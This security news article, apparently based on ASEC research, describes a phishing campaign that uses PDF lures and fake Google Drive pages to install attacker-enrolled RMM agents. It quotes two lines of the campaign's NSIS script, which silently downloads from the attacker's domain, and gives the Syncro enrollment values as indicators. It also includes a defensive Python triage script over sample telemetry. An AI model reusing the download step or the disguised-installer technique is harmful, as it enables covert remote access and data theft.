A concerning trend in cybersecurity has emerged with threat actors weaponizing PDF files to trick users into installing Remote Monitoring and Management (RMM) tools on their systems. These sophisticated attacks, which have been active since at least October 2025, leverage the legitimate functions of RMM software to gain unauthorized access to victim machines. The malicious PDF campaign exploits user trust, disguising itself within seemingly innocuous documents to deploy powerful remote access tools.
The attacks were identified by ASEC researchers, who found that threat actors are distributing RMM tools such as Syncro, SuperOps, NinjaOne, and ConnectWise ScreenConnect through carefully crafted phishing campaigns. The phishing emails use subject lines and attachment names such as “Invoice,” “Product Order,” and “Payment” to catch the attention of business users. The ultimate goal is to establish a persistent remote-access backdoor that looks like ordinary IT administration to traditional security controls.
Threat Actors Leveraging RMM Tools Via Weaponized PDFs
The modus operandi involves users receiving a malicious PDF file. Upon opening it, victims see either a high-quality image that stands in for the document content or a misleading “Failed to load PDF document” error message. Both lures are designed to push the user into clicking an embedded link. The link redirects them to a fake Google Drive page or a fraudulent website impersonating a trusted service such as Adobe. These initial deception tactics are what move the victim into the next stage of the attack chain.
On the fake Google Drive page, the attackers present a file named “Video_recorded_on_iPhone17.mp4.” However, this is not a video file but an RMM installer disguised with a deceptive file name. The downloaded file often retains a naming convention like “Video_recorded_on_iPhone17.mp4 Drive.google.com” to further cement the illusion of legitimate video content. This social engineering tactic is crucial for getting users to execute the malicious payload.
ASEC researchers have tracked this campaign back to at least October 2025, as evidenced by the digital certificates used to sign the malicious installers. The threat actor behind this operation has been systematically distributing a variety of RMM tools, all signed with the same valid certificate. This strategy is employed to evade detection by security products, as RMM tools are not inherently classified as malware. Their legitimate administrative purpose allows them to fly under the radar of many security solutions.
Technical Breakdown of the Infection Mechanism
The infection process begins when a user is tricked into downloading what they believe is a video file. The executable downloaded from the phishing site is an installer built with tools such as Advanced Installer or NSIS. Once executed on the target system, it silently deploys the intended RMM tool.
For installations targeting Syncro RMM, the installer passes Syncro-specific parameters at execution time: a “key” value of “yK0UAOaHHwdbYDOp_sr51w” and a “customerid” of “1709830.” These values enroll the compromised machine into the attacker’s Syncro account, so the threat actor can identify and remotely control it through Syncro’s own legitimate infrastructure. This highlights how attackers are co-opting legitimate IT management tools for malicious ends.
A variant of the attack built as an NSIS downloader embeds a script that fetches additional payloads from attacker-controlled servers. The malicious NSI script runs instructions such as:
    StrCpy $0 "$TEMP\temp_response.html"
    INetC::get /SILENT "https://anhemvn124.com" $0
The first line stores a path in the user’s temp folder in $0; the second calls the INetC plugin with the /SILENT flag to download content from the malicious domain into that file without showing a progress dialog, preparing the system for further compromise. The installer then deploys NinjaOne RMM through Windows Installer (msiexec) in quiet mode, so the user sees no installation prompts.
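The two installer behaviors described above (Syncro enrollment parameters on the command line, and a quiet msiexec install of an RMM agent launched from a user-writable path) are both visible in process-creation telemetry. The following is an added example, not code from ASEC or from this article, of triage logic run over constructed Sysmon Event ID 1 / 4688-style events. The Syncro “key” and “customerid” values are the ones reported above; the installer file names, the exact key=value switch syntax, the host names, and the allowlist of expected deployment parents are assumptions for the example.

```python
"""Flag RMM-installer launches that match the campaign traits described on the page.

Sample events are constructed for this example. Only the Syncro key/customerid
indicators come from the report; process names, the NinjaOne MSI file name, the
key=value switch syntax and the deployment allowlist are assumed.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    host: str
    image: str          # full path of the new process
    command_line: str
    parent_image: str   # full path of the parent process


# Indicators quoted in the report (Syncro parameters used by this campaign).
SYNCRO_IOC = {"key": "yK0UAOaHHwdbYDOp_sr51w", "customerid": "1709830"}

# Assumed: substrings that identify RMM agent packages in an msiexec command line.
RMM_MSI_HINTS = ("ninja", "syncro", "superops", "screenconnect", "connectwise")

# Assumed: parent processes from which a quiet RMM install is expected here (e.g. SCCM).
EXPECTED_DEPLOY_PARENTS = {r"c:\windows\ccm\ccmexec.exe", r"c:\windows\system32\services.exe"}

# Path fragments that indicate a user-writable location (lower-cased comparison).
USER_WRITABLE = ("\\downloads\\", "\\appdata\\local\\temp\\", "\\temp\\")

# key=value / key:value / "key value" pairs; the delimiter form is an assumption.
_KV = re.compile(r'(?i)\b(key|customerid)[=:\s]+"?([A-Za-z0-9_\-]+)"?')


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def decoy_video_name(ev: ProcessEvent) -> bool:
    """Executable whose name pretends to be a video or a Google Drive download."""
    name = _basename(ev.image)
    return name.endswith(".exe") and (".mp4" in name or "drive.google.com" in name)


def syncro_campaign_params(ev: ProcessEvent) -> bool:
    """Command line carries the Syncro enrollment values reported for this campaign."""
    found = {k.lower(): v for k, v in _KV.findall(ev.command_line)}
    return any(found.get(k) == v for k, v in SYNCRO_IOC.items())


def quiet_rmm_msi_unexpected(ev: ProcessEvent) -> bool:
    """msiexec quiet install of an RMM package, not launched by the expected deployer."""
    if _basename(ev.image) != "msiexec.exe":
        return False
    cl = ev.command_line.lower()
    if not re.search(r"(^|\s)/q[nb]?\b", cl) and "/quiet" not in cl:
        return False                       # interactive installs are out of scope
    if not any(h in cl for h in RMM_MSI_HINTS):
        return False
    parent = ev.parent_image.lower()
    if parent in EXPECTED_DEPLOY_PARENTS:
        return False                       # sanctioned software deployment
    return any(p in parent for p in USER_WRITABLE) or any(p in cl for p in USER_WRITABLE)


RULES = [
    ("decoy-video-executable", decoy_video_name),
    ("syncro-campaign-parameters", syncro_campaign_params),
    ("quiet-rmm-msi-unexpected-parent", quiet_rmm_msi_unexpected),
]


def triage(events):
    """Return (host, rule_name, command_line) for every rule that fires."""
    hits = []
    for ev in events:
        for name, rule in RULES:
            if rule(ev):
                hits.append((ev.host, name, ev.command_line))
    return hits


# Constructed sample telemetry: three campaign-style events and one legitimate deployment.
SAMPLE_EVENTS = [
    ProcessEvent("ws01",
                 r"C:\Users\bob\Downloads\Video_recorded_on_iPhone17.mp4 Drive.google.com.exe",
                 r'"C:\Users\bob\Downloads\Video_recorded_on_iPhone17.mp4 Drive.google.com.exe"',
                 r"C:\Windows\explorer.exe"),
    ProcessEvent("ws01",
                 r"C:\Windows\System32\msiexec.exe",
                 r'msiexec.exe /i "C:\Users\bob\AppData\Local\Temp\NinjaOneAgent.msi" /qn',
                 r"C:\Users\bob\Downloads\Video_recorded_on_iPhone17.mp4 Drive.google.com.exe"),
    ProcessEvent("ws02",
                 r"C:\Users\amy\AppData\Local\Temp\SyncroSetup.exe",
                 "SyncroSetup.exe --key=yK0UAOaHHwdbYDOp_sr51w --customerid=1709830",
                 r"C:\Windows\explorer.exe"),
    ProcessEvent("fs-admin",
                 r"C:\Windows\System32\msiexec.exe",
                 r'msiexec.exe /i "\\fileserver\deploy\NinjaOneAgent.msi" /qn',
                 r"C:\Windows\CCM\CcmExec.exe"),
]

if __name__ == "__main__":
    for host, rule, cmd in triage(SAMPLE_EVENTS):
        print(f"{host}: {rule}: {cmd}")
```

The third rule is the one that needs tuning per environment: a quiet RMM install is normal when your own deployment tooling runs it, so the allowlist of parent processes is what separates the campaign from sanctioned rollouts, and the user-writable-path condition catches the case where the MSI was dropped by a downloader running from Downloads or Temp.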
The abuse of RMM tools presents a significant challenge for defenders. Because these tools are designed for legitimate remote administration, firewalls and anti-malware products routinely permit their traffic and their installers, and a validly signed installer inherits that trust. This blind spot gives attackers persistent remote access, effectively turning an IT support tool into a weapon for data theft and system compromise. Since the campaign is ongoing, organizations should treat any RMM agent that was not deployed through their own tooling as suspect, restrict installation to the products they actually use, and alert on unexpected enrollments rather than relying on malware signatures alone.